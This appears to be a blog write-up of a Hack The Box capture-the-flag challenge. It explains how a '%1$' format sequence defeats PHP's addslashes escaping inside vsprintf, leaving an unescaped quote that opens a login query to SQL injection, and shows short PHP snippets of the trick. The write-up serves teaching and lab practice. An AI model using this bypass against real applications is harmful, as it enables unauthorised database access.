I"×<p><img src="/assets/images/ctf/htb-writeup-baby-interdimensional-internet/synack.png" alt="center-aligned-image" class="align-center" /></p>

<p>Baby is a medium machine, your challenge is the escape caracter, from the php functions, where you need to test, to see what is valid. And try the sql command that are valids from database.</p>

<h2 id="web-page">Web Page</h2>

<p>Initialy we see a web page where has a php code, and a sql command, that receive a post parameter.</p>

<p><img src="/assets/images/ctf/htb-writeup-baby-sql/1.png" alt="" /></p>

<p>Now we can try a sql injection.<br />
But first we have to know what those functions in php code does.<br />
<strong>addslashes</strong>: https://www.php.net/manual/en/function.addslashes.php
<strong>vsprintf</strong>: https://www.php.net/manual/en/function.vsprintf.php</p>

<p>The addslashe, basically add a slash to scape in a string, so will does this:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$pass</span> <span class="o">=</span> <span class="nb">addslashes</span><span class="p">(</span><span class="s2">"passs'"</span><span class="p">)</span>
<span class="k">echo</span> <span class="nv">$pass</span>
<span class="c1"># result = pass\'</span>
</code></pre></div></div>
<p>The vsprintf will format a string:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$pass</span> <span class="o">=</span> <span class="nb">addslashes</span><span class="p">(</span><span class="s2">"passs'"</span><span class="p">)</span>
<span class="k">echo</span> <span class="nv">$pass</span>
<span class="c1"># result = pass\'</span>
<span class="nb">vsprintf</span><span class="p">(</span><span class="s2">"SELECT * FROM users WHERE password=('</span><span class="nv">$pass</span><span class="s2">') AND username=('%s')"</span><span class="p">,</span> <span class="s1">'admin'</span><span class="p">)</span>
<span class="c1"># result = SELECT * FROM users WHERE password=('pass\'') AND username=('%s')", 'admin')</span>
</code></pre></div></div>
<p>But if use the %1$ the / will be retired. The 1 reference the \, add was added by addslashes, but the \ is a invalid reference, so is removed.</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$pass</span> <span class="o">=</span> <span class="nb">addslashes</span><span class="p">(</span><span class="s2">"pass%1$'"</span><span class="p">)</span>
<span class="k">echo</span> <span class="nv">$pass</span>
<span class="c1"># result = pass%1$\'</span>
<span class="nb">vsprintf</span><span class="p">(</span><span class="s2">"SELECT * FROM users WHERE password=('</span><span class="nv">$pass</span><span class="s2">') AND username=('%s')"</span><span class="p">,</span> <span class="s1">'admin'</span><span class="p">)</span>
<span class="c1"># result = SELECT * FROM users WHERE password=('pass'') AND username=('%s')", 'admin')</span>
</code></pre></div></div>

<p>No we can do the sql injection.</p>

<p><img src="/assets/images/ctf/htb-writeup-baby-sql/2.png" alt="" /></p>

<p>Now the table is know.</p>

<p><img src="/assets/images/ctf/htb-writeup-baby-sql/3.png" alt="" /></p>
:ET